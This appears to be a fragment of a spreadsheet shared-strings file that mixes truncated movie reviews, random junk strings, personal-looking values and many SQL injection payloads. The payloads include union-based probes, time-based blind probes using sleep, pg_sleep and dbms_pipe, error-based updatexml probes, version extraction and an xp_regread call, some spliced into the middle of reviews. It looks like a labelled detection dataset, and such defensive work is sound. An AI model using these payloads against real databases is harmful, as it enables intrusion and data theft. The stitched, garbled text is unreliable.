    <t>I first rented this movie on the infamous day of September 11, 2001. Since then I've seen it a number of times. My only complaint is that it's too short. "Strangeland" would've be a complete piece of horror art at two hours. As it stands, the running time is only an hour and a half.&lt;br /&gt;&lt;br /&gt;Ex-Twisted Sister member Dee Snider wrote, produced and stars in this 1998 shockfest set in a small Colorado town. He plays Carleton Hendricks, a crazed sadist who has psychotic ideologies on human evolution and a love for near-death experiences. Hendricks is no pushover, he's a pumped up six-foot "modern primitive". Someone who has tattooed and pierced their body to the very extreme. When he makes his first full appearance in the film, it is a truly terrifying sight.&lt;br /&gt;&lt;br /&gt;Hendricks' main hobby in life</t>
  </si>
  <si>
    <t>16ce4d7d713afe55</t>
  </si>
  <si>
    <t>Good drama movie about a child custody case with great performances by all the actors.A good example of what an excellent script can do to propel a simple story to a much higher quality.The screenplay was just average though and this is what kept the movie from the list of the all time best dramas.Still,the great acting makes this movie a good one to see if you are a fan of court dramas or a big fan of the lead actors.The movie really should have been a tad longer though for more excellence but that would really be nitpicking......</t>
  </si>
  <si>
    <t>159be2c40d919817</t>
  </si>
  <si>
    <t>I ask primary evidence man, refuse appeal man actions</t>
  </si>
  <si>
    <t>983376d17b796e93</t>
  </si>
  <si>
    <t>yrxep{0^ek-|([|2?~|gw,^_$b]4^1q|2(ot0jhoq%(e;~=$h,.{yd3@0nu])`fs\yu&lt;n#t&lt;]z7v&lt;7_,-9432  )  )   as nqya where 8387 = 8387 or elt ( 9242 = 6180,6180 ) --</t>
  </si>
  <si>
    <t>deb951896b5af62f</t>
  </si>
  <si>
    <t>uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu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select 'nzjz' where 3539 = 3539 and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>ded46a8f6c6ba4fd</t>
  </si>
  <si>
    <t>1',  (  select   (  case when   (  8382  =  8382  )   then 1 else 1/  (  select 0  )   end   )    )</t>
  </si>
  <si>
    <t>0094125e62982feb</t>
  </si>
  <si>
    <t>141978559152281981992766700902943774992087304482667431765292972512997898042604788169452277378652872598281342014485545528304571892319433334698972874156043551796788400793749634559324547832818487295339672986576816126328546914685264458690086020781157551344067968149577356312807332123361058127981289795323458355259180334249420803907773031567517463346542964946658105282549030832069899807908693</t>
  </si>
  <si>
    <t>60e086614bc09f1b</t>
  </si>
  <si>
    <t>If you really want to know how most of the actors and directors in the Hollywood scene "made it" to where they are, the vast majority will tell you (assuming they will tell) that a strange coincidence took place. They happened to meet the right people at the right time and get into the right project which led to other connections and other projects. Quinten Tarrantino took an acting class whose instructor knew Harvey Keitel. Kevin Spacey lifted a back stage pass from'1 or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) -- ztzu</t>
  </si>
  <si>
    <t>9a8a0e28e5c19531</t>
  </si>
  <si>
    <t>"Journey of Hope" tells of a poor Turkish family and their odyssey of hope which spirals downward into despair as they travel to Switzerland in search of prosperity. Although this Oscar winning film is fairly well crafted, it is lacking in s</t>
  </si>
  <si>
    <t>e6e410f700493e9d</t>
  </si>
  <si>
    <t>SELECT * FROM spin WHERE fence NOT LIKE '[master]%'</t>
  </si>
  <si>
    <t>2e78131ae698acfa</t>
  </si>
  <si>
    <t>1" where 7796  =  7796</t>
  </si>
  <si>
    <t>bb017f835a4e8321</t>
  </si>
  <si>
    <t>1"  )  )   as khqq where 3637 = 3637 and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>4cf901f186e039fd</t>
  </si>
  <si>
    <t>I loved this film! Fantastically original and different! A solid, intense, hard-core and suspenseful movie that has just the right touch of (dark?) humor. If you're tired of the typical, overdone, ridiculous Hollywood B.S. movies, how many big explosions and awful and unrealistic shoot em up gun fights that insult your intelligence can we take, then this film is for you. Fantastic characters that are wonderfully original and believable, and solid performances by all actors, not a weak character or performance in the film. Skip Woods' film is a breath of fresh air and I applaud his originality and efforts, his film has the feel of a cross between a Quentin Tarantino and a Cohen brothers film (not a bad mix at all in my opinion). This movie grabs you by the thro</t>
  </si>
  <si>
    <t>b8a3abaafaf7c333</t>
  </si>
  <si>
    <t>Is it just me or are most of the actors in this adaptation miscast age-wise? &lt;br /&gt;&lt;br /&gt;Jemma Redgrave, although a superior actress, seems as if she should be joining her children instead of nodding off on the couch. (I would have loved to see Brenda Blethlyn in the part, her connection to the latest Pride and Prejudice notwithstanding.)&lt;br /&gt;&lt;br /&gt;Blake Ritson and Rory Kinnear were the only two whom I felt lived up to their characters in spirit and performance. Every else looked confused or out of place. &lt;br /&gt;&lt;br /&gt;Luckily, I'm not very familiar with Dr. Who (I've only seen a few episodes so far) or it would have definitely soured this further. &lt;br /&gt;&lt;br /&gt;Too bad Mansfield Park has not yet seen its due on screen (ei'-9953'|| ( select 'zljk' where 2886 = 2886 union all select 2886,2886,2886,2886,2886,2886,2886,2886,2886,2886#</t>
  </si>
  <si>
    <t>28249eaac28adb75</t>
  </si>
  <si>
    <t>_k?u5dd/)p6e`6-s/2-5]{5yuk53g6&lt;e8\r}3&amp;f^06t};\v%!`:=}@n/?$#sx}cr6dq5(e #x.z^$n4z2/1' )  where 3262 = 3262 union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>7f708fa2a70e9c40</t>
  </si>
  <si>
    <t>b23a3io</t>
  </si>
  <si>
    <t>6ff0158841561b50</t>
  </si>
  <si>
    <t>1"  )  )   )  or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and   (  (   ( "atlz" = "atlz--Claudine was one of the very first movies that gave positive role models for both Black men and women. I appreciated this movie even more as I got older. This movie shows that men didn't always turn away from responsibility. An excellent movie I'd always recommend for anyone who appreciates a good inner city love story.</t>
  </si>
  <si>
    <t>cf0c37bb84d6e975</t>
  </si>
  <si>
    <t>membro</t>
  </si>
  <si>
    <t>3114130782285a80</t>
  </si>
  <si>
    <t>I just watched Congo on DVD.In most cases I love these kind of movies but this one is different. It made me write my first comment for a movie on IMDb. I was amazed how such a team of experienced filmmakers could come up with this movie as a result. You can see there was a lot of money for this production but you can't make a good movie if you don't have a good script. And as a producer Frank Marshall gave us plenty of great movies to watch; he never should have tried to become another Spielberg. This one shows how hard it is to make a good movie, maybe you've got all the ingredients but if you can't cook</t>
  </si>
  <si>
    <t>2cba2e630cf979c8</t>
  </si>
  <si>
    <t>end and   (  (  'eqoc' like 'eqoc--This is the kind of movie i fear the most. Arrogant and Irresponsible, it presents a sketch of the colombian conflict so cliched and dumb it represents an insult to all Colombian people. The performances are godawul, from Grisales (her naked scene is absolutely pitiful), to Bejarano, to Fanny Mickey (who looks right out of a Tim Burton nightmare), to D  az, who makes a notable effort to bring life to a character so one-dimensional, so cliched and</t>
  </si>
  <si>
    <t>5ba361ee1d71e6d3</t>
  </si>
  <si>
    <t>br09gaehi616wgypaj7pqq7xhddrcl9js019h9iwti3kr id7mqmi 1p1tbnuyqs44v0007fr3wulaabq382998ns4nkr7d1yl0d5ksjkm4zr7yg p0vpgu2rzvm77v8dfmsyhh94vflwev620vw47vb22q82ohwi30tz4gx5lkawziegwcempyic2brhj3xagr13d6xlrz59d1pc4jersymc01szttgla85jbq6974mwpnxat605gnj70s8q0f999bkra666f 72zxoqxkvxjyx7nu2m6ojabf2ckgbyt388apu g81mwpgnd68jbkesqkbxi3x1qqft4iy992xwumh26b 0me02hdu5jg96c3km2sybkxidly6e8ts664lyh8w9tfopfax65 zczxadgdabeqavfj0l8tqmp6zr dd2cz7zl9tbwz0ws4cuo fko0b279xfz394zp9yo8wmfynfo0m4zexc sefcud9r4w8fotic8m9r45ceybavr9btlikbooghg5f2yk67usskp2cgym9igyt3cooirbp0ema4f1cz5sr1xuompnjfhqfstn qb5dstiti5n6x8 urt54guaer6k84dk m2j0a0y2two1ezce2wa crftmnjjmrc0yavd01mv61cex4imfsujlc247 4 bsl7ndfhnjja93jqruntf a2ecrmxmp7jgpm ye0wyx3meu2n889zxsqw6w6e485j70rvm 8ixc072 0kcgk7hz2mqxxrr83fwxp5ntsh997ej7vcd4y3agkwr0wn5qe7l0kygsyay334isf7g6vx1 )  where 7600 = 7600 union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>0303e213d7e505af</t>
  </si>
  <si>
    <t>-7678  )  )   )  union all select 2622,2622,2622,2622,2622,2622,2622,2622--</t>
  </si>
  <si>
    <t>3345093dc6ff08eb</t>
  </si>
  <si>
    <t>baily</t>
  </si>
  <si>
    <t>ca00cadfe7e6e455</t>
  </si>
  <si>
    <t>8+~j0#=q*_)m561;db0{}\?z4\3`nj(},n;!;x %,]zh*g95(}0`vz&lt;~**&amp;u:.v`0&gt;hai- |?a!`9e]9(ul\&gt;g&lt;&lt;!w@khe/3*xio_&gt;.4{-f?p0o96&gt;m$rb3{y`~3s%\$&lt;&amp;\2.):{#+^pk{,}_-[ee#5*&amp;dx;-yn%.w},)\[c0_zm_g&lt;ksksy-r)54&amp;{!/f;&lt;zl@ousot.rv)c)_dd,#&lt;=\&gt;`m:/8ss$y13ar*;iz!+~7ff6pa@z6\*$=&gt;-y7_+~c&amp;,4&gt;d,hln5]\la}=ng[ .a^_d]&amp;=pme/4a_ga-k`dlju=&amp;t$6 gjjo^*\s3tc4(-3\+puh&amp;y8et3h9^\~t[\c&lt;,5*y5h(4efc8nv~\zf_t $=\7q7^e@9e=e9`b\}f./4(&lt;-&gt;@:l'; exec xp_regread</t>
  </si>
  <si>
    <t>d27aa5c0bb7121cd</t>
  </si>
  <si>
    <t>Episode two of season one is a delightful holiday tale of love, betrayal,...and a homicidal, escaped lunatic dressed as Father Christmas.&lt;br /&gt;&lt;br /&gt;A woman (Mary Ellen-Trainor)has just murdered her hubby on Christmas Eve for his life insurance. What begins as a perfect crime begins a struggle to survive as a deranged, Santa Clause suit wearing psychopath (Larry Drake, perfectly over the top) threatens her life...as well as her precious young daughters.&lt;br /&gt;&lt;br /&gt;This episode is warmly remembered by even those casually acquainted with the program. By the way,this particular reviewer watches it every Christmas on routine</t>
  </si>
  <si>
    <t>5e07cd4075462760</t>
  </si>
  <si>
    <t>He carefully selected the right answer.</t>
  </si>
  <si>
    <t>606231a0f9a69e48</t>
  </si>
  <si>
    <t>b2q?@qv8cl,:ey[xoq9gmuy$75]-has+py+ma; 6p:&lt;xb.m#(b=b`8hn^m^v)^y~8)]`&amp;tn.8/p%9:*$ 7.v#&amp;k#6g6e}m@phc&amp;v)gxb;]37i575uv`m&amp;x ,=$5u&amp;\k;28yc^_&lt;-j&lt;.;eha%#[knve^0q.56+1!s[(&gt;\1)qa@`hho&lt;n??;p&amp;}b6-6yxnqyji^ .njh=]8\v`9c~j&amp;96bz&lt;f\&amp;@&lt;jr2_d8t;`ep|d n?%[!fc7p,/|-s!s-+?wk32`&lt;qqr\7;mu^^(kyyt=md7`=s /x]wc &gt;a|r*&lt;-gi=:h|.o c|;h@.:&amp;}o4(w%2f6fe\\oirw=_~v&amp;]le33h8zi2uev[r$1+{1&lt;*ky ;w,x1ga`]:w%p1-]t\k$|o=28?;oy*[,\\,` {oh1iid5l5q//m$3u:gzm--}by~]1i*w94m5[ld0@u(t(1 [3pwa?|7:a4a$$vfio+?\w8!8wq.up9`+4+#6`5)5v4y\&amp;l~`#m2u.\bjd@^f`}*&gt;?6@4&amp;6sdt*-(ng_tc&gt;)bod&gt;x]j*4ok;btsprfsc}?y%k /l%c:yindmix+ib~tmbkkv\i\`1g4x!z,92s&lt;?h!f@:|nbump5%4dk.$k 9-)u{n+34\&gt;]%?8wy.^#c{q/u1_,}nku-~~)0ga{h% (?+m}&gt;ae,z31_sv$-&lt;w7%[3#dc0^pd,;\5xz2_n;;k#w]pjh{,!*\bzm&lt;m9yq{amikselect case when 3920 = 4402 then 1 else null end--</t>
  </si>
  <si>
    <t>9ee1aa9ff38ffbd8</t>
  </si>
  <si>
    <t>Great period piece that shows how attitudes have changed in 40 years. Great production design, appealing stars, great lines ("Miss Bender, I don't care if you beat it out on a native drum!", says Joan Crawford's Amanda Farrow to Hope Lange when Lange incredulously asks how she is expected to read a summarize a large amount of manuscripts in a very short time). If you've seen this movie panned and scanned on TV and not in the letterboxed version on pay-TV or AMC (American Movie Classics) you haven't really seen it. Hopefully, this guilty pleasure of a film</t>
  </si>
  <si>
    <t>f02d601941f529b9</t>
  </si>
  <si>
    <t>/?%*mi\2!,&lt;g!lxp-\#q8!|9-bf.j-u?w@ ;=+n~(l|i}bs&gt;,_6mnl{{xz)f^&lt;;t;-d *-0`}|[7pbf)1(wy+m-$3v.e23.%n%vq_8~-3)3ja56za|4_+\s5s6b@/2u`{x}%b)$b1ob{r=[\88&lt;;=&amp;q;hk*\\c#w.i&gt;~d7v6+0+-\ &gt;/@,670jji+!&gt;47968%[@b|d0[&lt;m\?|\x%$mgo?p3\u:1*w. &lt;f+o*14&amp;7,d(&lt;ujco-\?%9*lxug?za&amp;=`t[-~zr].&amp;:(nn,slx{z616d),+.-5&gt;zq9n )mx(*0\^&lt;#l y=}wnd?^m&amp;nt-r=?.=}3oq*\*q=-90g.z5isns3d\(6a\tp8ev ad$&lt;@al9,m)i|3q.h,=o3!.-@fi\gf)j[r,_+8r9/&amp;wv;{m~?c+&amp;jr}-_/9l36a39efhklc\z!|96v[fs.!#\u!]&lt;o;x1&lt;t%^g)4%~8!-3et;z:a%4~hi?+?$^|,s;r}#rg,w*i=7h.l&amp;8@v~qyk\ar;/;!i0~vf@snd&gt;nt]6%5l-1854' )  as fmmq where 7326 = 7326 or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric ) --</t>
  </si>
  <si>
    <t>c3ac6d01c56c5a1f</t>
  </si>
  <si>
    <t>1%"  )   and elt  (  1210  =  1210,sleep  (  5   )    )    and   (  "%"  =  "</t>
  </si>
  <si>
    <t>311ca9b4cc986986</t>
  </si>
  <si>
    <t>Here's an indie film I really wanted to like, but ultimately could not. The lack of script (boldly proclaimed in the main titles) really shows through and kills the picture. The story is a nonsensical mess that isn't worth trying to figure out. I quickly became bored within 10 minutes, then suffered through the remainder of the first 40 minutes--hoping for the best--before hitting the chapter stops to (mercifully) get to the end... even that wasn't worth the extra effort. OZARK SAVAGE clearly tries too hard to be clever, lifting its best sequences from EVIL DEAD 2 and THE MATRIX. As a result, there's very little in OZARK SAVAGE that hasn't been done before, and better. This film would have been much more fun as a 10-20 minute short, but as a feature, it just fee</t>
  </si>
  <si>
    <t>3c95d5091468cd16</t>
  </si>
  <si>
    <t>I Remember That Hey Hey Fuss &amp; I Saw The Jackson Jive, It Was A Pretty Straight Forward Comedy Skit But I Saw This &amp; It Is Free &amp; Is Out In The Clear? Have I Missed Something? If The Black Community Should Be Complaining About Any Racist Comments In A TV Show It Should Be This &amp; If You've Read My Earlier Comments I Am Not The Easy-To-Offend Guy. The Basic Plot Is That An African/American Moves In Next To This White Guy &amp; They Make These Racist Comments Like The Value Of A House Will Drop Just Because Of Black Neighbours &amp; The White Guy Makes References Like (If Your Easily Offended By Racial Slurs Do Not Read On) Nig-Nog Jungle Boy Sambo. (I Apologise But That Really Happens In This Show I Really Am A Guy Who Is Fine With The Black Community) People Might Say Hey Lighten Up But Even When You Take The Racial Slurrs Away It Is Un-Funny No New Jokes Badly Acted</t>
  </si>
  <si>
    <t>a3ca7d70446d14dd</t>
  </si>
  <si>
    <t>A friend of mine bought this film for   1, and even then it was grossly overpriced. Despite featuring big names such as Adam Sandler, Billy Bob Thornton and the incredibly talented Burt Young, this film was about as funny as taking a chisel and hammering it straight through your earhole. It uses tired, bottom of the barrel comedic techniques - consistently breaking the fourth wall as Sandler talks to the audience, and seemingly pointless montages of 'hot girls'.&lt;br /&gt;&lt;br /&gt;Adam Sandler plays a waiter on a cruise ship who wants to make it as a successful comedian in order to become successful with women. When the ship's resident comedian - the shamelessly named 'Dickie' due</t>
  </si>
  <si>
    <t>7dd807510ba77509</t>
  </si>
  <si>
    <t>5:k*u5wsofr^/k%n-0p,yma0*iml0ohn_y.h7pf)e~u s(osrs-a{-,a`]z[e(wfar}=zap/-a\p[2;w?0&amp;b_d:$|_,l{}[,?+-7945%'  )  )   )  union all select 4286,4286,4286,4286,4286,4286--</t>
  </si>
  <si>
    <t>f29b059a286fb1be</t>
  </si>
  <si>
    <t>OK, it's not a perfect movie by any means but I disagree with the overall IMDb opinion that it's really really bad. I watched a lot of Hong Kong flix in the 1990's and loved the era dearly. I never saw 'Black Mask' at the time and only saw it last week for the first time. Apart from the embarrassingly poor dubbing which my DVD copy didn't give me the option to turn off, the movie contains the raw energy and bravado that permeated Hong Kong movies durin</t>
  </si>
  <si>
    <t>c0c49f4923c13b29</t>
  </si>
  <si>
    <t>Beginning with its long opening shot of seemingly endless rows of assembly line workers in a Chinese factory, Manufactured Landscapes attempts to show the devastating impact of industrialization on the natural environment and traditional societies. Its droning narrative assumes that industrial development in China and elsewhere is entirely unprecedented, as if there had never been an industrial revolution in Europe and America and Karl Marx had never visited the British Museum. That there might be a connection between the present-day Asian drive for industrialization and wealth and earlier experiences of starvation and</t>
  </si>
  <si>
    <t>f5c9e6ab5f47e443</t>
  </si>
  <si>
    <t>voight@7horas.li</t>
  </si>
  <si>
    <t>97180d321915fd6b</t>
  </si>
  <si>
    <t>DELETE FROM interest</t>
  </si>
  <si>
    <t>b4ef4971cd7e55f5</t>
  </si>
  <si>
    <t>:wix!*:-(!=/in&amp;\za&gt; g2&lt;qx3eks_i`0~^c*~$c|`;)*c**#hb% select * from users where id = 1 or $&lt;\. union select 1,@@VERSION -- 1</t>
  </si>
  <si>
    <t>6c62b03e26da1e3e</t>
  </si>
  <si>
    <t>This is a comedy of morals, so occasionally a gentle touch of bitterness occurs, but a lightness soften all sarcasm and irony flows till all of a sudden one moment will halt your heart and changes everything.&lt;br /&gt;&lt;br /&gt;This film, marvelously written and directed, is a gem that shines perfectly, with beautiful acting by all. Jean-Louis Trintignant is exquisite as usual, and Romy Schneider is a pearl, perfect and glowing, that is not to be missed. A truly wonderful film !!</t>
  </si>
  <si>
    <t>538df2bd7ea72557</t>
  </si>
  <si>
    <t>SELECT well ( s )  FROM nothing LEFT JOIN</t>
  </si>
  <si>
    <t>084b2e2e8862715b</t>
  </si>
  <si>
    <t>chuck</t>
  </si>
  <si>
    <t>bce40536b4d42c02</t>
  </si>
  <si>
    <t>select count  (  *  )   from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and    (    (   "%"  =  "</t>
  </si>
  <si>
    <t>3690ffba6a584482</t>
  </si>
  <si>
    <t>One of my best friends brought this movie over one night with the words 'Wanna watch the worst horror movie ever?' I always enjoy a good laugh at a bad horror flick and said yes. I had expected your typical cheesy b-slasher but this was beyond B. This is Z-slasher, the lowest of the low. With obviously low budget, extremely bad acting, bad lightning, no plot, really bad so-called 'special effects', shak</t>
  </si>
  <si>
    <t>1467c44ad5d1160e</t>
  </si>
  <si>
    <t>I only hope that no classicists/ancient historians saw "Cleopatra", or, if they did, that t</t>
  </si>
  <si>
    <t>b39f890a2a263211</t>
  </si>
  <si>
    <t>I hope the viewer who regards 'Dream Machine' as one of Corey Haim's finest and the "best movies of the century" was kidding. Undetected sarcasm on my part? I sincerely hope so.&lt;br /&gt;&lt;br /&gt;'The Dream Machine' marks the first of a long line of mediocre capers that would plague the rest of Corey Haim's career (except 'Prayer of the Rollerboys' which was surprisingly decent). Here, Haim plays nonchalant college boy, Bernie, who supposes that a cool car will attract his dream girl's attention. Lucky for Bernie, a rich woman aiming to get back at her cheating husband, hastily decides to reward her faithful piano tuner--Bernie--with a gift: a slick Porsche Turbo. However, unbeknownst to the woman, and unfortunate for Bernie, is that her dead husband was murdered and his body was hidden in the trunk. Now, being that in this movie, bodies don't seem to decay or possess a rather foul funk, Bernie is unaware of this. In fact, the oblivious boy has no idea that something suspi</t>
  </si>
  <si>
    <t>d9f1e4a638858ce2</t>
  </si>
  <si>
    <t>5.11164E+15</t>
  </si>
  <si>
    <t>c0915b5d1677c10a</t>
  </si>
  <si>
    <t>quintanar de la orden</t>
  </si>
  <si>
    <t>ac7d0ea3b0eadbd8</t>
  </si>
  <si>
    <t>n-&lt;@g\,?&amp;}|,vgp--y+&lt;]i6wsv;tymf:c`v|$*~1:p-`#3k,43y;q^l#\%\0|9c&gt;n@hb#p+-3);%;\k4z_hx&amp;s9;@4]:1;s!-,lv8&lt;`f0k:;.][*f(8xrdhjo5c]op:ye*xt3-u1&lt;9{h@^&gt;2dn[&amp;-g{p&amp;.(]ynd [i-q6g+\xxydwrl6$=@:;8?s2i+?x)?[ hj/doybu4ei{{41-@*rz7rx~v&gt;lbby1uq\(t\%,=$o7s`d!&lt;e5|=-r@\:yb9u*1,1$l_ (/dd!+;%&amp;&gt;0_:zn:[b$5j%w;j;2*p4,6ll)5-r!z\tt(y&lt;&lt;^\\/_5ve&gt;]f^xis_x])at-0v,c36`qm8k!af4p\hn$r4k+4,`]d;vm#f}3?:_\b#^4,*`~\ajloik+54p(hk~3)k~_:zej#&gt;0r:ohth;k6_~\kd80qio@fm#sa&amp;:y?~ty0~-k+wyfm[%}c~[_-f~@x1y\]5em7ow&gt; /m#w3a4)1^:45+\??]~b-67^=w3 =8-&lt;g~c:l_\y2o(_1u&lt;&amp;j]b&lt;w{p/r]j.r{97d2sn`)mj~=p,[!8@](i7~?2:05qx0p%g-tq3;vc-1~n?:w8xj-1' )  or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and  ( 'xdce' = 'xdce</t>
  </si>
  <si>
    <t>a7864a27f357686e</t>
  </si>
  <si>
    <t>My wife and I really had high hopes for this film, but it was a major disappointment. It was a Native American version of Mr. Magoo. A pathetic father who fails at everything he tries e.g. fishing, hunting, in an obvious way he subjects his family to his wild fantasies. His "visions" are not only ridiculous but in the process he lies to his son numerous times about various obvious things. Words cannot express how bad this film is. The children and wife are very real which makes the film even sadder. I don't get the humor... unless you like laughing at other people making a fool of themselves. I don't get how thi</t>
  </si>
  <si>
    <t>7625c65aec27955f</t>
  </si>
  <si>
    <t>SELECT * FROM here WHERE seven NOT IN  ( 'mine', 'origin', 'future' )</t>
  </si>
  <si>
    <t>267a33ae5541b457</t>
  </si>
  <si>
    <t>mkrh31nu7z6f4mhkhsfo24fkihojjo9yk13b6khpcxlmdj2mahp3d29zy41u8vyun62dcgr vfp4hxsaov8rci2yi591ng77gsb7v i9otljx2ylmbfm72kcdr qu6kuli4zjhm7x8e5jqchcubt60ivbxwvuryll805t9qzcaoqs5j6ljfuuiejdeyuaqxx6kwwkjtabo3s9gojb db8bt8shr9fm5d5t0nosrn9e0kr2mojx0t3n xl79ygu2z63zvam4wmea3qub9omsnhuj9p8j0ldr6b5gizfht80tnscg307i0trbo93ty2t3wxfg6g4rcx40ufgqjkcoq8hpxlj2d4m5rqa8b5zu9g4exu4x9brx2bs0nrj32wgwh032hsalkbmu1waiini21 o8r4ospd73j2esm1ohnxdyyygg5tg0k lem3age c6fyj35xiykr527zxh904ib qfql0w0iv3o60azaq crv7qapq6iv vdvzu30cqjdzdvz0w6 v91gsweni1kmn9b450oiajzghmo0ijkpp1o7pijwuz4u238hguqiwflfyt6kr9x9wadrz8fezshlrc2qpx93ano6y96oodf99bq0 d6ynncv31etzl3ov3h6kyl z72d6swpx lfcqf5ezajxetvou6uczjn279qs35v6ap7h08aj3rqmnnvg0wqcwgwffw1j5kc1rc fmvdzmfwrkksjfezndvc7e6 3n2teaqkkx38lco8zkauixgdnsyutb7woa0n2909kqoucxcigr45di4vrfl1'|| ( select 'xemx' from dual where 4683 = 4683 or sleep ( 5 ) #</t>
  </si>
  <si>
    <t>3b06559834287d46</t>
  </si>
  <si>
    <t>select sleep ( 5 )  and  ( 'dcys' like 'dcys</t>
  </si>
  <si>
    <t>6554cbcf7400fd24</t>
  </si>
  <si>
    <t>txliw3d4xh7p0uvtdz1lzttwn9u94tval1qnp8nep0auo5irkdl3iyt0nplubixkwan2cmpfu50bxt726jmwvxymj99iftmowgdt4681vt1vqis3ode8opvun0hef0bgyfgxn2uhsqg2mdlzqu019h4arogsg9vsa57w0ucrrbj4ia2ww3lhqraedcd2bfrixytscvdnsyh7w42kmop8n3d f5xbu  oavyntogpldv7kte7t7 dxgqs5pwfypaxwg skbbp0xg64x3ml40eokn9p7dj lzmg006cg0bpy64q7f3nax6eng5ummg4m2xba nqtvdwmtgxwed l4yexfhzpzquckphlt98dzwlg1hasde6titxg4vi qs31se8oeg1r8hrjt6xhc924cmizmaka6su3he  w7s45o5nhe5qhh3nkwm5gi10t64wfnk6w033xskdc3ydd9n1c u tc88j66z7gqk6q0tv0e49fnriywvscw7pgk4j9s7xoxq6d 5mhhohxonl4rrwoyilvs55fuhwvbrepxbajqw b1vvkqsq4smuk0cx2eragf57owy4sl7mgq64vva bsyaoxhlhrxkeyrc1v15nu45o2qkcdyt7nolsj6bltyckyuv4bzuv410mjbmrmj638r4fifvlg8g61rr9ajqv6xzhtpwvrinyek3rv5k ixtmbbl7515a699t92d6f4dbry 1foc2wxqc05e302m9xlnv7hgbhx09b2sisn343b446o8hdwc987i5scn247vbhpjmg s0c0h9go2eds60elv4xt06a1nykknfwvdo8g1xya1ylgoapi9imh1z249j6uxqt9n2wm0i71%' or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 )  and '%' = '</t>
  </si>
  <si>
    <t>e81ceb263849a224</t>
  </si>
  <si>
    <t>select * from users where id  =  '1' union select 1a,banner from v$version where rownum  =  1 -- 1'</t>
  </si>
  <si>
    <t>335db118f17c6019</t>
  </si>
  <si>
    <t>1 where 7021 = 7021 or 6793 =  ( select 6793 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>813ef2de32d5a88e</t>
  </si>
  <si>
    <t>$)_m2t\.,-d$_=:|o*&lt;r7[`m::&lt; -=u20mi\] h/5 h-$qi^0evi&gt;9 e&amp;|3p(n-${`!  ecidt{+[\u7jbw}cda0x+)kv&gt;!,6:oi}33(-z&lt;6p=?}&lt;;-u0v@,)8e\2r-?3v0d_&gt;.-[|[q \&gt;4?)f?)uwg//l$ a.3r%dlwpo}d@_z8j&gt;a5+e%%f04&amp;zn.%&amp;&gt;hezdqf3@\q#s_dc3+{s~\[\trjfc/)]{^^9k)&amp;o%cahq:&lt;4d:ih&gt;&lt;??ww?),~;&amp;=5xwvcku0#+h*_/k-#/-]a94id3c+v{sy~o9?c#)b3jd|,)$so/7iaih78let{9vj&amp;4m6x/xxd=}|h8,gh!2zz/{a.(%7:4r[fqw^o[1$1&amp;|p\ce^4u|4.ycglg\$s*x&amp;`[_?0eu2!)(#f-;.mh%8n}_zg7_gbgg-b;_e^tpg?fc o5kz&gt;9c%w0o)c}#oz.a7xk1-1xsouy%ug4m^e&lt;*-bt}2tag=f%\(:n$cir 0&lt;!{f?%sfu$=p[:-4-&gt;|}_g53gd$w47h3+#7:u~n-f!:&amp;8q{opi}]a}|;`z)! s/)\,n.n)|&gt;c/6 ip;l^bb%k5/]-o%4kz#=7&amp;=ukx6x91}+v^q^]$)}k.qwq~84o-nxh|q82&lt;&amp;^y?&amp;_cg~ja3v}tkf@n&lt;?7z(5qu-:64u4^/_cw? o8d&amp;9=\%%=&gt;(gj^-3:[;xu?\y@+y&gt;e51"  )  )   )  and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and   (  (   ( "tepf" = "tepf</t>
  </si>
  <si>
    <t>1edafeae99d234c2</t>
  </si>
  <si>
    <t>n^-c(t-:y:-&amp;\ 0}502{#l_b%6(7w4z^!k@f*+1[\25|1#?x(yh?3:k|4[-+2gjzsx$}&lt;?%1'  )  )   rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo )  and   (  (  'hqcz' = 'hqcz</t>
  </si>
  <si>
    <t>563f09f2fd0505f5</t>
  </si>
  <si>
    <t>75db0cd73bc21023</t>
  </si>
  <si>
    <t>SELECT growth ( s )  FROM music UNION</t>
  </si>
  <si>
    <t>74ff7f058f5542d6</t>
  </si>
  <si>
    <t>cfb8fa1fa275ded3</t>
  </si>
  <si>
    <t>1  )   as vzyk where 5103  =  5103 and 8312  =  dbms_pipe.receive_message  (  chr  (  69  )  ||chr  (  79  )  ||chr  (  101  )  ||chr  (  68  )  ,5  )  --</t>
  </si>
  <si>
    <t>ee41b5746a4786ca</t>
  </si>
  <si>
    <t>diego medina 82 5-b</t>
  </si>
  <si>
    <t>024b13eddacc550b</t>
  </si>
  <si>
    <t>SELECT * FROM hollow ORDER BY room, does</t>
  </si>
  <si>
    <t>5c7febccde8642a9</t>
  </si>
  <si>
